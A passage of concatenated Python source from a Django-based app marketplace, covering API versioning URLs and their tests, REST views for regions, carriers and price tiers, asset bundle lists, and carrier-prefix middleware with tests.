self.request = RequestFactory().get('/')
self.request.API_VERSION = 1
self.serializer = self.SerializerClass(context=
{'request': self.request})
self.obj = self.Struct()
self.obj.pk = 42
@mock.patch('mkt.api.serializers.reverse')
def test_get_url(self, mock_reverse):
self.serializer.get_url(self.obj)
reverse_args, reverse_kwargs = mock_reverse.call_args
ok_(mock_reverse.called)
eq_(reverse_args[0], '%s-detail' % self.url_basename)
eq_(type(reverse_kwargs['request']), WSGIRequest)
eq_(reverse_kwargs['kwargs']['pk'], self.obj.pk)
########NEW FILE########
__FILENAME__ = test_throttle
########NEW FILE########
__FILENAME__ = test_urls
from mock import patch
from nose.tools import eq_, ok_
from django.core.urlresolvers import resolve, Resolver404
import amo.tests
from mkt.api.urls import include_version
# Semantic names for the relevant values in the tuple returned by include().
MODULE, NAMESPACE = 0, 2
# Semantic names for the relevant values in the tuple returned by resolve().
FUNCTION = 0
class TestIncludeVersion(amo.tests.TestCase):
def includes(self):
return include_version(1), include_version(2)
@patch('django.conf.settings.API_CURRENT_VERSION', 1)
def test_v1(self):
v1, v2 = self.includes()
eq_(v1[NAMESPACE], None)
eq_(v2[NAMESPACE], 'api-v2')
ok_('v1' in v1[MODULE].__file__)
ok_('v2' in v2[MODULE].__file__)
@patch('django.conf.settings.API_CURRENT_VERSION', 2)
def test_v2(self):
v1, v2 = self.includes()
eq_(v1[NAMESPACE], 'api-v1')
eq_(v2[NAMESPACE], None)
ok_('v1' in v1[MODULE].__file__)
ok_('v2' in v2[MODULE].__file__)
class BaseTestAPIVersionURLs(object):
"""
Mixin for API version URL tests providing helpful assertions for common
testing scenarios.
"""
def assertViewName(self, url, view_name):
"""
Assert that a resolution of the passed URL is for the view with the
passed name.
"""
resolved = resolve(url)
eq_(resolved[FUNCTION].func_name, view_name)
def assertView404(self, url):
"""
Assert that a resolution of the passed URL does one of the following
two things, each of which indicate a 404:
1) Raises a Resolver404 error.
2) Resolves to a view with the name 'EndpointRemoved'.
"""
try:
resolved = resolve(url)
except Resolver404:
pass
else:
eq_(resolved[FUNCTION].func_name, 'EndpointRemoved')
class TestAPIv1URLs(BaseTestAPIVersionURLs, amo.tests.TestCase):
"""
Tests for expected changes of URLs between versions of the API using the v1
urlconf.
"""
urls = 'mkt.api.v1.urls'
def test_collections(self):
"""
Tests the v1 half of a move of the collection endpoints from:
- v1: /rocketfuel/collections/
- v2: /feed/collections/
"""
self.assertViewName('/rocketfuel/collections/', 'CollectionViewSet')
self.assertView404('/feed/collections/')
class TestAPIv2URLs(BaseTestAPIVersionURLs, amo.tests.TestCase):
"""
Tests for expected changes of URLs between versions of the API using the v2
urlconf.
"""
urls = 'mkt.api.v2.urls'
def test_collections(self):
"""
Tests the v2 half of a move of the collection endpoints from:
- v1: /rocketfuel/collections/
- v2: /feed/collections/
"""
self.assertView404('/rocketfuel/collections/')
self.assertViewName('/feed/collections/', 'CollectionViewSet')
########NEW FILE########
__FILENAME__ = test_views
import json
from mock import patch
from nose import SkipTest
from nose.tools import eq_, ok_
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import Http404, HttpRequest
from django.test.utils import override_settings
from test_utils import RequestFactory
import amo.tests
from amo.helpers import urlparams
import mkt
from mkt.api.tests.test_oauth import RestOAuth
from mkt.api.views import ErrorViewSet, endpoint_removed
from mkt.site.fixtures import fixture
class TestErrorService(RestOAuth):
def setUp(self):
if not settings.ENABLE_API_ERROR_SERVICE:
# Because this service is activated in urls, you can't reliably
# test it if the setting is False, because you'd need to force
# django to re-parse urls before and after the test.
raise SkipTest()
super(TestErrorService, self).setUp()
self.url = reverse('error-list')
def verify_exception(self, got_request_exception):
exception_handler_args = got_request_exception.send.call_args
eq_(exception_handler_args[0][0], ErrorViewSet)
eq_(exception_handler_args[1]['request'].path, self.url)
ok_(isinstance(exception_handler_args[1]['request'], HttpRequest))
@override_settings(DEBUG=False)
@patch('mkt.api.exceptions.got_request_exception')
def test_error_service_debug_false(self, got_request_exception):
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data.keys(), ['detail'])
eq_(data['detail'], 'Internal Server Error')
self.verify_exception(got_request_exception)
@override_settings(DEBUG=True)
@patch('mkt.api.exceptions.got_request_exception')
def test_error_service_debug_true(self, got_request_exception):
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(set(data.keys()), set(['detail', 'error_message', 'traceback']))
eq_(data['detail'], 'Internal Server Error')
eq_(data['error_message'], 'This is a test.')
self.verify_exception(got_request_exception)
class TestConfig(RestOAuth):
fixtures = fixture('user_2519')
def setUp(self):
super(TestConfig, self).setUp()
self.url = reverse('site-config')
def testConfig(self):
self.create_switch('allow-refund', db=True)
res = self.anon.get(self.url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['settings']['SITE_URL'], 'http://testserver')
switch = data['waffle']['switches']['allow-refund']
eq_(switch['name'], 'allow-refund')
eq_(switch['active'], True)
def test_cors(self):
self.assertCORS(self.anon.get(self.url), 'get')
class TestRegion(RestOAuth):
def test_list(self):
res = self.anon.get(urlparams(reverse('regions-list')))
eq_(res.status_code, 200)
data = json.loads(res.content)
for row in data['objects']:
region = mkt.regions.REGIONS_DICT.get(row['slug'])
eq_(row['name'], region.name)
eq_(row['slug'], region.slug)
eq_(row['id'], region.id)
eq_(row['default_currency'], region.default_currency)
eq_(row['default_language'], region.default_language)
eq_(len(data['objects']), len(mkt.regions.REGIONS_DICT))
eq_(data['meta']['total_count'], len(mkt.regions.REGIONS_DICT))
def test_detail(self):
res = self.get_region('br')
eq_(res.status_code, 200)
data = json.loads(res.content)
region = mkt.regions.REGIONS_DICT['br']
self.assert_matches_region(data, region)
def test_detail_worldwide(self):
res = self.get_region('worldwide')
eq_(res.status_code, 200)
data = json.loads(res.content)
region = mkt.regions.REGIONS_DICT['restofworld']
self.assert_matches_region(data, region)
def test_detail_bad_region(self):
res = self.get_region('foo')
eq_(res.status_code, 404)
def assert_matches_region(self, data, region):
eq_(data['name'], region.name)
eq_(data['slug'], region.slug)
eq_(data['id'], region.id)
eq_(data['default_currency'], region.default_currency)
eq_(data['default_language'], region.default_language)
def get_region(self, slug):
return self.anon.get(reverse('regions-detail', kwargs={'pk': slug}))
class TestCarrier(RestOAuth):
def test_list(self):
res = self.anon.get(reverse('carriers-list'))
eq_(res.status_code, 200)
data = json.loads(res.content)
for row in data['objects']:
region = mkt.carriers.CARRIER_MAP.get(row['slug'])
eq_(row['name'], region.name)
eq_(row['slug'], region.slug)
eq_(row['id'], region.id)
eq_(len(data['objects']), len(mkt.carriers.CARRIER_MAP))
eq_(data['meta']['total_count'], len(mkt.carriers.CARRIER_MAP))
def test_detail(self):
res = self.anon.get(reverse('carriers-detail',
kwargs={'pk': 'carrierless'}))
eq_(res.status_code, 200)
data = json.loads(res.content)
carrier = mkt.carriers.CARRIER_MAP['carrierless']
eq_(data['name'], carrier.name)
eq_(data['slug'], carrier.slug)
eq_(data['id'], carrier.id)
class TestEndpointRemoved(amo.tests.TestCase):
def setUp(self):
self.factory = RequestFactory()
def test_exempt(self):
ok_(endpoint_removed.csrf_exempt)
def test_404(self):
methods = ['get', 'post', 'options']
for method in methods:
request = getattr(self.factory, method)('/')
with self.assertRaises(Http404):
endpoint_removed(request)
########NEW FILE########
__FILENAME__ = urls
"""
API URL versioning goes here.
The "current" version should be marked via the empty pattern. Each other
version's URLs should be loaded in this way, with the most recent versions
first:
url('^v2/', include('mkt.api.v2.urls')),
url('^v1/', include('mkt.api.v1.urls')),
Each version's URLs should live in its own submodule, and should inherit from
the previous version's patterns. Example:
from mkt.api.v1.urls import urlpatterns as v1_urls
router = SimpleRouter()
router.register(r'widgets', WidgetViewSet, base_name='widget')
urlpatterns = patterns('',
url(r'^widgets/', include(feed.urls)),
) + v1_urls
Strategies for deprecating and removing endpoints are currently being discussed
in bug 942934.
"""
from django.conf import settings
from django.conf.urls import include, patterns, url
def include_version(version):
"""
Returns an include statement containing URL patterns for the passed API
version. Adds a namespace if that version does not match
`settings.API_CURRENT_VERSION`, to ensure that reversed URLs always use the
current version.
"""
kwargs = {}
if version != settings.API_CURRENT_VERSION:
kwargs['namespace'] = 'api-v%d' % version
return include('mkt.api.v%d.urls' % version, **kwargs)
urlpatterns = patterns('',
url('^v2/', include_version(2)),
url('^v1/', include_version(1)),
# Necessary for backwards-compatibility. We assume that this always means
# API version 1. The namespace ensures that no URLS are ever reversed to
# this pattern. Yummycake because we already ate the tastypie.
url('', include('mkt.api.v1.urls', namespace='yummycake')),
)
########NEW FILE########
__FILENAME__ = urls
from django.conf import settings
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.abuse.urls import api_patterns as abuse_api_patterns
from mkt.account.urls import api_patterns as account_api_patterns
from mkt.api.base import SubRouter, SubRouterWithFormat
from mkt.api.views import (CarrierViewSet, CategoryViewSet,
error_reporter, ErrorViewSet, PriceTierViewSet,
PriceCurrencyViewSet, RefreshManifestViewSet,
RegionViewSet, site_config)
from mkt.collections.views import CollectionImageViewSet, CollectionViewSet
from mkt.comm.urls import api_patterns as comm_api_patterns
from mkt.developers.urls import dev_api_patterns, payments_api_patterns
from mkt.features.views import AppFeaturesList
from mkt.receipts.urls import receipt_api_patterns
from mkt.reviewers.urls import api_patterns as reviewer_api_patterns
from mkt.search.views import (FeaturedSearchView, RocketbarView, SearchView,
SuggestionsView)
from mkt.stats.urls import stats_api_patterns, txn_api_patterns
from mkt.submit.views import PreviewViewSet, StatusViewSet, ValidationViewSet
from mkt.webapps.views import AppViewSet, PrivacyPolicyViewSet
rocketfuel = SimpleRouter()
rocketfuel.register(r'collections', CollectionViewSet,
base_name='collections')
subcollections = SubRouterWithFormat()
subcollections.register('image', CollectionImageViewSet,
base_name='collection-image')
apps = SimpleRouter()
apps.register(r'preview', PreviewViewSet, base_name='app-preview')
apps.register(r'validation', ValidationViewSet, base_name='app-validation')
apps.register(r'category', CategoryViewSet, base_name='app-category')
apps.register(r'status', StatusViewSet, base_name='app-status')
apps.register(r'app', AppViewSet, base_name='app')
subapps = SubRouter()
subapps.register('refresh-manifest', RefreshManifestViewSet,
base_name='app-refresh-manifest')
subapps.register('privacy', PrivacyPolicyViewSet,
base_name='app-privacy-policy')
services = SimpleRouter()
if settings.ENABLE_API_ERROR_SERVICE:
services.register(r'error', ErrorViewSet, base_name='error')
services.register(r'carrier', CarrierViewSet, base_name='carriers')
services.register(r'region', RegionViewSet, base_name='regions')
services.register(r'price-tier', PriceTierViewSet,
base_name='price-tier')
services.register(r'price-currency', PriceCurrencyViewSet,
base_name='price-currency')
urlpatterns = patterns('',
url('', include('mkt.fireplace.urls')),
url('', include('mkt.darjeeling.urls')),
url(r'^apps/', include(apps.urls)),
url(r'^apps/app/', include(subapps.urls)),
url(r'^apps/search/featured/', FeaturedSearchView.as_view(),
name='featured-search-api'),
url(r'^apps/search/suggest/', SuggestionsView.as_view(),
name='suggestions-search-api'),
url(r'^apps/search/rocketbar/', RocketbarView.as_view(),
name='rocketbar-search-api'),
url(r'^apps/search/', SearchView.as_view(), name='search-api'),
url(r'^services/', include(services.urls)),
url(r'^services/config/site/', site_config, name='site-config'),
url(r'^fireplace/report_error/\d*', error_reporter, name='error-reporter'),
url(r'^rocketfuel/', include(rocketfuel.urls)),
url(r'^rocketfuel/collections/', include(subcollections.urls)),
url(r'^apps/', include('mkt.versions.urls')),
url(r'^apps/', include('mkt.ratings.urls')),
url(r'^apps/features/', AppFeaturesList.as_view(),
name='api-features-feature-list'),
url('', include(abuse_api_patterns)),
url('', include(account_api_patterns)),
url('', include('mkt.installs.urls')),
url('', include('mkt.prices.urls')),
url('', include(reviewer_api_patterns)),
url('', include('mkt.webpay.urls')),
url('', include(dev_api_patterns)),
url('', include(payments_api_patterns)),
url('', include(receipt_api_patterns)),
url('', include('mkt.monolith.urls')),
url('', include(comm_api_patterns)),
url('', include(stats_api_patterns)),
url('', include(txn_api_patterns)),
)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.api.base import SubRouterWithFormat
from mkt.api.v1.urls import urlpatterns as v1_urls
from mkt.api.views import endpoint_removed
from mkt.collections.views import CollectionImageViewSet, CollectionViewSet
from mkt.feed.views import FeedAppImageViewSet, FeedAppViewSet, FeedItemViewSet
feed = SimpleRouter()
feed.register(r'apps', FeedAppViewSet, base_name='feedapps')
feed.register(r'collections', CollectionViewSet, base_name='collections')
feed.register(r'items', FeedItemViewSet, base_name='feeditems')
subfeedapp = SubRouterWithFormat()
subfeedapp.register('image', FeedAppImageViewSet,
base_name='feed-app-image')
subcollections = SubRouterWithFormat()
subcollections.register('image', CollectionImageViewSet,
base_name='collection-image')
urlpatterns = patterns('',
url(r'^rocketfuel/collections/.*', endpoint_removed),
url(r'^feed/', include(feed.urls)),
url(r'^feed/apps/', include(subfeedapp.urls)),
url(r'^feed/collections/', include(subcollections.urls)),
) + v1_urls
########NEW FILE########
__FILENAME__ = views
import json
from django.conf import settings
from django.http import Http404
from django.views import debug
from django.views.decorators.csrf import csrf_exempt
import commonware.log
import raven.base
import waffle
from cache_nuggets.lib import memoize
from rest_framework import generics
from rest_framework.decorators import permission_classes
from rest_framework.mixins import ListModelMixin, RetrieveModelMixin
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.serializers import (BooleanField, CharField, ChoiceField,
DecimalField, HyperlinkedIdentityField,
HyperlinkedRelatedField,
ModelSerializer)
from rest_framework.views import APIView
from rest_framework.viewsets import (GenericViewSet, ModelViewSet,
ReadOnlyModelViewSet)
import amo
from addons.models import Category, Webapp
from constants.payments import PAYMENT_METHOD_CHOICES, PROVIDER_CHOICES
from lib.constants import ALL_CURRENCIES
from mkt.api.authentication import RestOAuthAuthentication
from mkt.api.authorization import AllowAppOwner, GroupPermission
from mkt.api.base import (cors_api_view, CORSMixin, MarketplaceView,
SlugOrIdMixin)
from mkt.api.fields import SlugChoiceField
from mkt.api.serializers import CarrierSerializer, RegionSerializer
from mkt.carriers import CARRIER_MAP, CARRIERS
from mkt.regions.utils import parse_region
from mkt.constants.regions import REGIONS_CHOICES_SLUG, REGIONS_DICT
from mkt.webapps.tasks import _update_manifest
from mkt.prices.models import Price, PriceCurrency
log = commonware.log.getLogger('z.api')
class TestError(Exception):
pass
class ErrorViewSet(MarketplaceView, GenericViewSet):
permission_classes = (AllowAny,)
def list(self, request, *args, **kwargs):
# All this does is throw an error. This is used for testing
# the error handling on dev servers.
# See mkt.api.exceptions for the error handler code.
raise TestError('This is a test.')
class CategorySerializer(ModelSerializer):
name = CharField('name')
resource_uri = HyperlinkedIdentityField(view_name='app-category-detail')
class Meta:
model = Category
fields = ('name', 'id', 'resource_uri', 'slug')
view_name = 'category'
class CategoryViewSet(ListModelMixin, RetrieveModelMixin, CORSMixin,
SlugOrIdMixin, MarketplaceView, GenericViewSet):
model = Category
serializer_class = CategorySerializer
permission_classes = (AllowAny,)
cors_allowed_methods = ('get',)
slug_field = 'slug'
def get_queryset(self):
qs = Category.objects.filter(type=amo.ADDON_WEBAPP,
weight__gte=0)
return qs.order_by('-weight')
class FlagSerializer(ModelSerializer):
class Meta:
model = waffle.models.Flag
class SwitchSerializer(ModelSerializer):
class Meta:
model = waffle.models.Switch
@memoize(prefix='config-settings')
def get_settings():
safe = debug.get_safe_settings()
_settings = ['SITE_URL']
return dict([k, safe[k]] for k in _settings)
@cors_api_view(['GET'])
@permission_classes([AllowAny])
def site_config(request):
"""
A resource that is designed to be exposed externally and contains
settings or waffle flags that might be relevant to the client app.
"""
def data(cls):
as_list = cls(cls.Meta.model.objects.all().order_by('name'),
many=True).data
return dict((d['name'], d) for d in as_list)
return Response({
# This is the git commit on IT servers.
'version': getattr(settings, 'BUILD_ID_JS', ''),
'waffle': {
'flags': data(FlagSerializer),
'switches': data(SwitchSerializer)
},
'settings': get_settings(),
})
class RegionViewSet(CORSMixin, MarketplaceView, ReadOnlyModelViewSet):
cors_allowed_methods = ['get']
authentication_classes = []
permission_classes = [AllowAny]
serializer_class = RegionSerializer
paginate_by = len(REGIONS_DICT)
def get_queryset(self, *args, **kwargs):
return REGIONS_DICT.values()
def get_object(self, *args, **kwargs):
region = parse_region(self.kwargs['pk'])
if region is None:
raise Http404
else:
return region
class CarrierViewSet(RegionViewSet):
serializer_class = CarrierSerializer
def get_queryset(self, *args, **kwargs):
return CARRIERS
def get_object(self, *args, **kwargs):
return CARRIER_MAP.get(self.kwargs['pk'], None)
@cors_api_view(['GET'])
@permission_classes([AllowAny])
def error_reporter(request):
request._request.CORS = ['GET']
client = raven.base.Client(settings.SENTRY_DSN)
error_data = json.loads(request.GET['sentry_data'])
client.capture('raven.events.Exception', data=error_data)
return Response(status=204)
class RefreshManifestViewSet(GenericViewSet, CORSMixin):
model = Webapp
permission_classes = [AllowAppOwner]
cors_allowed_methods = ('post',)
slug_lookup = 'app_slug'
def detail_post(self, request, **kwargs):
obj = self.get_object()
self.check_object_permissions(request, obj)
if obj.is_packaged:
return Response(
status=400,
data={'reason': 'App is a packaged app.'})
_update_manifest(obj.pk, True, {})
return Response(status=204)
class EnumeratedField(ChoiceField):
def from_native(self, value):
for k, v in self.choices:
if value == v:
return k
def to_native(self, key):
for k, v in self.choices:
if key == k:
return v
class PriceTierSerializer(ModelSerializer):
resource_uri = HyperlinkedIdentityField(view_name='price-tier-detail')
active = BooleanField()
name = CharField()
method = EnumeratedField(PAYMENT_METHOD_CHOICES)
price = DecimalField()
class Meta:
model = Price
fields = ['resource_uri', 'active', 'name', 'method', 'price']
class PriceTierViewSet(generics.CreateAPIView,
generics.RetrieveUpdateDestroyAPIView,
ModelViewSet):
permission_classes = [GroupPermission('Prices', 'Edit')]
authentication_classes = [RestOAuthAuthentication]
serializer_class = PriceTierSerializer
model = Price
class PriceCurrencySerializer(ModelSerializer):
resource_uri = HyperlinkedIdentityField(view_name='price-currency-detail')
tier = HyperlinkedRelatedField(view_name='price-tier-detail')
currency = ChoiceField(choices=ALL_CURRENCIES.items())
carrier = CharField(required=False)
price = DecimalField()
provider = EnumeratedField(PROVIDER_CHOICES)
method = EnumeratedField(PAYMENT_METHOD_CHOICES)
region = SlugChoiceField(choices_dict=dict(REGIONS_CHOICES_SLUG))
paid = BooleanField()
dev = BooleanField()
class Meta:
model = PriceCurrency
fields = ['carrier', 'currency', 'dev', 'method', 'paid', 'price',
'provider', 'region', 'resource_uri', 'tier']
class PriceCurrencyViewSet(ModelViewSet):
permission_classes = [GroupPermission('Prices', 'Edit')]
authentication_classes = [RestOAuthAuthentication]
serializer_class = PriceCurrencySerializer
model = PriceCurrency
filter_fields = ('tier', 'provider', 'currency', 'price')
def post_save(self, obj, created):
log.info('Price %s %s.' % (obj, 'created' if created else 'updated'))
def destroy(self, request, *args, **kwargs):
obj = self.get_object()
obj.delete()
log.info('Price %s deleted.' % (obj,))
return Response(status=204)
class EndpointRemoved(APIView):
"""
View that always returns a 404.
To be used when API endpoints are removed in newer versions of the API.
"""
def dispatch(self, request, *args, **kwargs):
raise Http404
endpoint_removed = csrf_exempt(EndpointRemoved.as_view())
########NEW FILE########
__FILENAME__ = asset_bundles
# A list of our CSS and JS assets for jingo-minify.
CSS = {
'mkt/devreg': (
# Contains reset, clearfix, etc.
'css/devreg/base.css',
# Base styles (body, breadcrumbs, islands, columns).
'css/devreg/base.styl',
'css/devreg/breadcrumbs.styl',
# Typographical styles (font treatments, headings).
'css/devreg/typography.styl',
# Header (aux-nav, masthead, site-nav).
'css/devreg/desktop-account-links.styl',
'css/devreg/header.styl',
# Item rows (used on Dashboard).
'css/devreg/listing.styl',
'css/devreg/legacy-paginator.styl',
# Buttons (used for paginator, "Edit" buttons, Refunds page).
'css/devreg/buttons.styl',
# Popups, Modals, Tooltips.
'css/devreg/notification.styl',
'css/devreg/overlay.styl',
'css/devreg/popups.styl',
'css/devreg/device.styl',
'css/devreg/tooltips.styl',
# L10n menu ("Localize for ...").
'css/devreg/l10n.styl',
# Forms (used for tables on "Manage ..." pages).
'css/devreg/forms.styl',
# Tables.
'css/devreg/data-grid.styl',
# Landing page
'css/devreg/landing.styl',
# "Manage ..." pages.
'css/devreg/manage.styl',
'css/devreg/prose.styl',
'css/devreg/authors.styl',
'css/devreg/in-app-config.styl',
'css/devreg/payments.styl',
'css/devreg/refunds.styl',
'css/devreg/transactions.styl',
'css/devreg/status.styl',
'css/devreg/content_ratings.styl',
# Image Uploads (used for "Edit Listing" Images and Submission).
'css/devreg/media.styl',
'css/devreg/invisible-upload.styl',
# Submission.
'css/devreg/submit-progress.styl',
'css/devreg/submit-terms.styl',
'css/devreg/submit-manifest.styl',
'css/devreg/submit-details.styl',
'css/devreg/validation.styl',
'css/devreg/submit.styl',
'css/devreg/tabs.styl',
# Developer Log In / Registration.
'css/devreg/login.styl',
# Footer.
'css/devreg/footer.styl',
),
'mkt/reviewers': (
'css/zamboni/editors.styl',
'css/devreg/consumer-buttons.styl',
'css/devreg/content_ratings.styl',
'css/devreg/data-grid.styl',
'css/devreg/manifest.styl',
'css/devreg/reviewers.styl',
'css/devreg/reviewers-header.styl',
'css/devreg/reviewers-mobile.styl',
'css/devreg/legacy-paginator.styl',
'css/devreg/files.styl',
),
'mkt/ecosystem': (
'css/devreg/reset.styl',
'css/devreg/consumer-typography.styl',
'css/devreg/login.styl',
'css/devreg/forms.styl',
'css/ecosystem/landing.styl',
'css/ecosystem/documentation.styl',
),
'mkt/in-app-payments': (
'css/devreg/reset.styl',
'css/devreg/consumer-typography.styl',
'css/devreg/buttons.styl',
'css/devreg/in-app-payments.styl',
),
'mkt/in-app-products': (
'css/devreg/in-app-products.styl',
),
'mkt/lookup': (
'css/devreg/manifest.styl',
'css/devreg/lookup-tool.styl',
'css/devreg/activity.styl',
),
'mkt/gaia': (
# Gaia building blocks.
'css/gaia/action_menu.css',
'css/gaia/switches.css',
'css/gaia/value_selector.css',
),
'mkt/operators': (
'css/devreg/legacy-paginator.styl',
'css/devreg/data-grid.styl',
'css/devreg/operators.styl',
),
}
JS = {
'mkt/devreg': (
# tiny module loader
'js/lib/amd.js',
'js/lib/jquery-1.9.1.js',
'js/lib/underscore.js',
'js/lib/format.js',
'js/lib/jquery.cookie.js',
'js/lib/stick.js',
'js/lib/csrf.js',
'js/common/fakefilefield.js',
'js/devreg/gettext.js',
'js/devreg/tracking.js',
'js/devreg/init.js', # This one excludes buttons initialization, etc.
'js/devreg/modal.js',
'js/devreg/overlay.js',
'js/devreg/capabilities.js',
'js/devreg/slugify.js',
'js/devreg/formdata.js',
'js/devreg/tooltip.js',
'js/devreg/popup.js',
'js/devreg/login.js',
'js/devreg/notification.js',
'js/devreg/outgoing_links.js',
'js/devreg/utils.js',
'js/impala/serializers.js',
'js/common/keys.js',
'js/common/upload-base.js',
'js/common/upload-packaged-app.js',
'js/common/upload-image.js',
'js/devreg/l10n.js',
# jQuery UI
'js/lib/jquery-ui/jquery-ui-1.10.1.custom.js',
'js/lib/jquery.minicolors.js',
'js/devreg/devhub.js',
'js/devreg/submit.js',
'js/devreg/tabs.js',
'js/devreg/edit.js',
'js/devreg/validator.js',
# Specific stuff for making payments nicer.
'js/devreg/payments-enroll.js',
'js/devreg/payments-manage.js',
'js/devreg/payments.js',
# For testing installs.
'js/devreg/apps.js',
'js/devreg/test-install.js',
'js/devreg/tracking_app_submit.js',
# IARC.
'js/devreg/content_ratings.js',
# Module initialization.
'js/devreg/devreg_init.js',
),
'mkt/reviewers': (
'js/lib/moment-with-langs.min.js', # JS date lib.
'js/zamboni/storage.js', # Used by editors.js
'js/common/buckets.js',
'js/devreg/reviewers/editors.js',
'js/devreg/apps.js', # Used by install.js
'js/devreg/reviewers/payments.js',
'js/devreg/reviewers/install.js',
'js/devreg/reviewers/buttons.js',
'js/devreg/manifest.js', # Used by reviewers.js
'js/devreg/reviewers/reviewers_commbadge.js',
'js/devreg/reviewers/reviewers.js',
'js/devreg/reviewers/expandable.js',
'js/devreg/reviewers/mobile_review_actions.js',
'js/common/fakefilefield.js',
'js/common/formsets.js', # TODO: Not used? Only seen in devreg/init.js
'js/devreg/reviewers/reviewers_init.js',
),
'mkt/in-app-payments': (
'js/lib/jquery-1.9.1.js',
'js/devreg/inapp_payments.js',
'js/lib/csrf.js',
'js/impala/serializers.js',
'js/devreg/login.js',
),
'mkt/in-app-products': (
'js/lib/es5-shim.min.js', # We might already assume these work.
'js/lib/flight.min.js',
'js/devreg/in_app_products.js',
),
'mkt/lookup': (
'js/common/keys.js',
'js/impala/ajaxcache.js',
'js/devreg/suggestions.js',
'js/devreg/manifest.js',
'js/devreg/lookup-tool.js',
),
'mkt/ecosystem': (
'js/devreg/ecosystem.js',
),
'mkt/debug': (
'js/debug/tinytools.js',
),
}
def jquery_migrated():
new_JS = dict(JS)
for bundle, files in new_JS.iteritems():
files = list(files)
try:
jquery = files.index('js/lib/jquery-1.9.1.js')
except ValueError:
continue
# Insert jquery-migrate immediately after jquery (before any files
# requiring jquery are loaded).
files.insert(jquery + 1, 'js/lib/jquery-migrate-1.1.0.js')
new_JS[bundle] = tuple(files)
return new_JS
def less2stylus():
"""
This will return a dict of the CSS bundles with `.styl` stylesheets
instead of `.less` ones.
Put in your local settings::
try:
MINIFY_BUNDLES['css'].update(asset_bundles.less2stylus())
except AttributeError:
pass
"""
import os
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def stylus(fn):
fn_styl = fn.replace('.less', '.styl')
if os.path.exists(os.path.join(ROOT, 'media', fn_styl)):
fn = fn_styl
return fn
new_CSS = dict(CSS)
for bundle, files in new_CSS.iteritems():
new_CSS[bundle] = tuple(stylus(f) for f in files)
return new_CSS
########NEW FILE########
__FILENAME__ = carriers
from threading import local
import mkt.constants.carriers
from mkt.constants.carriers import CARRIERS
__all__ = ['get_carrier', 'get_carrier_id', 'set_carrier']
_local = local()
def get_carrier():
"""
Returns the name of the current carrier (or None) for the
request lifecycle.
Example: telefonica
"""
return getattr(_local, 'carrier', None)
def get_carrier_id():
"""Returns the carrier ID for the request lifecycle."""
carrier = get_carrier()
if carrier is None:
return carrier
for carr in CARRIERS:
if carr.slug == carrier:
return carr.id
return mkt.constants.carriers.UNKNOWN_CARRIER.id
def set_carrier(name):
"""
Sets the name of the carrier for the current request lifecycle.
"""
_local.carrier = name
class CarrierPrefixer:
def __init__(self, request, carrier):
self.request = request
self.carrier = carrier
def fix(self, path):
url_parts = [self.request.META['SCRIPT_NAME'], self.carrier,
path.lstrip('/')]
return '/'.join(url_parts)
########NEW FILE########
__FILENAME__ = context_processors
from . import get_carrier
def carrier_data(request):
"""
Context processor that provides CARRIER to all views.
"""
return {'CARRIER': get_carrier()}
########NEW FILE########
__FILENAME__ = middleware
from django.shortcuts import redirect
from django.utils.cache import patch_vary_headers
from amo.helpers import urlparams
from amo.urlresolvers import set_url_prefix
from mkt.constants.carriers import CARRIER_MAP
from . import set_carrier
class CarrierURLMiddleware(object):
"""
Supports psuedo-URL prefixes that define a custom carrier store.
For example, if you browse the Marketplace at /telefonica/ then this
middleware will
1. strip off the telefonica part so all other URLs work as expected;
2. allow you to access 'telefonica' from mkt.carriers.get_carrier(); and
3. set a prefix so that reverse('whatever') returns /telefonica/whatever.
See bug 769421
"""
def process_request(self, request):
carrier = stored_carrier = None
set_url_prefix(None)
set_carrier(None)
# If I have a cookie use that carrier.
remembered = request.COOKIES.get('carrier')
if remembered in CARRIER_MAP:
carrier = stored_carrier = remembered
choice = request.REQUEST.get('carrier')
if choice in CARRIER_MAP:
carrier = choice
elif 'carrier' in request.GET:
# We are clearing the carrier.
carrier = None
# Update cookie if value have changed.
if carrier != stored_carrier:
request.set_cookie('carrier', carrier)
set_carrier(carrier)
def process_response(self, request, response):
if request.REQUEST.get('vary') != '0':
patch_vary_headers(response, ['Accept-Language', 'Cookie'])
return response
########NEW FILE########
__FILENAME__ = tests
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_
from test_utils import RequestFactory
from amo.tests import TestCase
from amo.urlresolvers import set_url_prefix
from . import get_carrier, set_carrier, context_processors
from .middleware import CarrierURLMiddleware
class TestCarrierURLs(TestCase):
def setUp(self):
set_carrier(None)
set_url_prefix(None)
def request(self, url):
request = RequestFactory().get(url)
# Simulate the RequestCookiesMiddleware.
request.set_cookie = mock.Mock()
return request
def get(self, url, request=None):
if not request:
request = self.request(url)
CarrierURLMiddleware().process_request(request)
return request
def test_ignore_non_carriers(self):
request = self.get('/not-a-store')
eq_(request.path_info, '/not-a-store')
assert not request.set_cookie.called
def test_set_carrier(self):
request = self.get('/?carrier=telefonica')
eq_(get_carrier(), 'telefonica')
assert request.set_cookie.called
def test_set_carrier_none(self):
request = self.request('/?carrier=')
request.COOKIES = {'carrier': 'telefonica'}
request = self.get('/?carrier=', request)
eq_(get_carrier(), None)
assert request.set_cookie.called
def test_set_carrier_to_none_url(self):
self.get('/telefonica/')
self.get('/not-a-store')
eq_(get_carrier(), None)
self.get('/?carrier=telefonica')
self.get('/?carrier=not-a-store')
eq_(get_carrier(), None)
def test_reverse(self):
self.get('/telefonica/')
eq_(reverse('manifest.webapp'), '/manifest.webapp')
self.get('/?carrier=telefonica')
eq_(reverse('manifest.webapp'), '/manifest.webapp')
def test_context(self):
request = self.get('/?carrier=telefonica')
eq_(request.path_info, '/')
ctx = context_processors.carrier_data(request)
eq_(ctx['CARRIER'], 'telefonica')
########NEW FILE########
__FILENAME__ = authorization
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ImproperlyConfigured
import commonware.log
from rest_framework.permissions import BasePermission, SAFE_METHODS
from access import acl
log = commonware.log.getLogger('mkt.collections')
class CuratorAuthorization(BasePermission):
"""
Permission class governing ability to interact with Collection-related APIs.
Rules:
